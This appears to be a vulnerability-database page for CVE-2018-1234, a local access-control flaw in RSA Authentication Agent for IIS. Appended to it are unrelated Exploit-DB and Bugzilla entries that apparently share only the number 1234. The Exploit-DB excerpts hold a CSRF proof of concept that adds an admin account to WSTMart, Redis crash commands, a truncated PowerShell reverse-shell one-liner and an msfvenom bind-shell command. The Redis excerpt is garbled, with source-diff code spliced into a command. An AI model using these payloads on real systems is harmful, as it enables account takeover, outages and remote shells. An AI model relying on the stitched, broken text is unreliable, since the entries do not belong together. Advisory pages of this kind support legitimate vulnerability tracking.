CVE-2018-1234
Published 2018-03-30
CVE-2018-1234: RSA Authentication Agent version 8.0.1 and earlier for Web for IIS is affected by a problem where access control list (ACL) permissions on a Windows Named Pipe…
Priority P4 · 28 · medium · 5.5 CVSS 3.0
AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
EPSS 0.46% · 36.6th percentile
RSA Authentication Agent version 8.0.1 and earlier for Web for IIS is affected by a problem where access control list (ACL) permissions on a Windows Named Pipe were not sufficient to prevent access by unauthorized users. The attacker with local access to the system can exploit this vulnerability to read configuration properties for the authentication agent.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dell_emc | rsa_authentication_agent_for_web_for_iis | — | — |
| rsa | authentication_agent_for_web | <= 8.0.1 | — |
CVSS provenance
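| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 5.5 | MEDIUM | CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N |
| nvd | v2.0 | 2.1 | LOW | AV:L/AC:L/Au:N/C:P/I:N/A:N |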
No detection rules found.
Exploit-DB
WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin)
exploitdb·2018-12-24·CVSS 8.8
CVE-2018-19138 [HIGH] WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin)
---
# Exploit Title: WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin)
# Date: 2018-12-23
# Exploit Author: linfeng
# Vendor Homepage:https://github.com/wstmall/wstmart/
# Software Link:http://www.wstmart.net/
# Version: WSTMart 2.0.8_181212
# CVE :CVE-2018-19138
# 0x02 CSRF PoC
# Function point: background management - staff management - login account
# poc:
# 1234.html
test.staffId.value="0";
test.loginName.value="admin3";
test.staffPhoto.value="";
test.loginPwd.value="admin3";
test.staffName.value="admin3";
test.staffNo.value="";
test.RoleId.value="0";
test.staffPhone.value="";
test.wxOpenId.value="";
test.workStatus.value="1";
test.staffStatus.value="1";
test.submit();
Exploit-DB
Redis 5.0 - Denial of Service
exploitdb·2018-06-20·CVSS 7.5
CVE-2018-12453 [HIGH] Redis 5.0 - Denial of Service
---
# Exploit Title: Redis 5.0 Denial of Service
# Date: 2018-06-13
# Exploit Author: Fakhri Zulkifli (@d0lph1n98)
# Vendor Homepage: https://redis.io/
# Software Link: https://redis.io/download
# Version: 5.0
# Fixed on: 5.0
# CVE : CVE-2018-12453
Type confusion in the xgroupCommand function in t_stream.c in redis-server in Redis before 5.0 allows remote attackers to cause denial-of-service via an XGROUP command in which the key is not a stream.
PoC:
$ ./src/redis-cli -p 1234
127.0.0.1:1234> set a 123
OK
127.0.0.1:1234> xgroup create a b $
Error: Connection reset by peer
The bug also could be triggered via netcat
$ nc 127.0.0.1 1234
set a 123
+OK
xgroup create a b $ argc >= 4) {
robj *o = lookupKeyWriteOrReply(c,c->argv[2],shared.nokeyerr);
- if (o == N
Exploit-DB
Nanopool Claymore Dual Miner 7.3 - Remote Code Execution
exploitdb·2018-05-17
CVE-2018-1000049 Nanopool Claymore Dual Miner 7.3 - Remote Code Execution
---
# Exploit Title: Nanopool Claymore Dual Miner >= 7.3 Remote Code Execution
# Date: 2018/02/09
# Exploit Author: ReverseBrain
# Vendor Homepage: https://nanopool.org/
# Software Link: https://github.com/nanopool/Claymore-Dual-Miner
# Version: 7.3 and later
# Tested on: Windows, Linux
# CVE : 2018-1000049
Suppose the miner is running on localhost on port 3333. First of all you need to convert a .bat string into hexadecimal format, for example, this one uses powershell to spawn a reverse shell on localhost listening on port 1234:
powershell.exe -Command "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Leng
Exploit-DB
DVD X Player Standard 5.5.3.9 - Buffer Overflow
exploitdb·2018-04-10·CVSS 7.8
CVE-2018-9128 [HIGH] DVD X Player Standard 5.5.3.9 - Buffer Overflow
---
######################################################
# Exploit Title: Buffer Overflow on DVD X Player Standard 5.5.3.9
# Date: 29.03.2018
# Vendor Homepage: http://www.dvd-x-player.com
# Software Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup-
# Standard.exe
# Category: Local (SEH Based)
# Exploit Credit: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Version: 5.5.3.9
# Tested on: Windows XP SP3 x86
# CVE: CVE-2018-9128
######################################################
# root@PKP:~# msfvenom -p windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 -b "\x00\x0a\x0d\x1a" -f python
# No platform was selected, choosing Msf::Module::Platform::Windows from the payload
# No Arch selected, selecting Arch: x86 from th
Bugzilla
CVE-2018-12015 perl-Archive-Tar: perl: Directory traversal in Archive::Tar [fedora-all]
bugzilla·2018-06-14·CVSS 7.5
CVE-2018-12015 [HIGH] CVE-2018-12015 perl-Archive-Tar: perl: Directory traversal in Archive::Tar [fedora-all]
Use the following template for the 'fedpkg update' request to submit an
update for this issue as it contains the top-level parent bug(s) as well as
this tracking bug. This will ensure that all associated bugs get updated
when new packages are pushed to stable.
# bugfix, security, enhancement, newpackage (required)
type=security
# testing, stable
request=testing
# Bug numbers: 1234,9876
bugs=1588760,1591205
# Description of your update
notes=Security fix for [PUT CVEs HERE]
# Enable request automation based on the stable/unstable karma thresholds
autokarma=True
stable_karma=3
unstable_karma=-3
# Automatically close bugs when this is marked as stable
close_bugs=True
# Suggest that users restart a
Bugzilla
CVE-2018-1115 mingw-postgresql: postgresql: Too-permissive access control list on function pg_logfile_rotate() [epel-7]
bugzilla·2018-05-10·CVSS 9.1
CVE-2018-1115 [CRITICAL] CVE-2018-1115 mingw-postgresql: postgresql: Too-permissive access control list on function pg_logfile_rotate() [epel-7]
Use the following template for the 'fedpkg update' request to submit an
update for this issue as it contains the top-level parent bug(s) as well as
this tracking bug. This will ensure that all associated bugs get updated
when new packages are pushed to stable.
# bugfix, security, enhancement, newpackage (required)
type=security
# testing, stable
request=testing
# Bug numbers: 1234,9876
bugs=1573276,1576771
# Description of your update
notes=Security fix for [PUT CVEs HERE]
# Enable request automation based on the stable/unstable karma thresholds
autokarma=True
stable_karma=3
unstable_karma=-3
# Automatically close bugs when this is marked as stable
close_bugs=True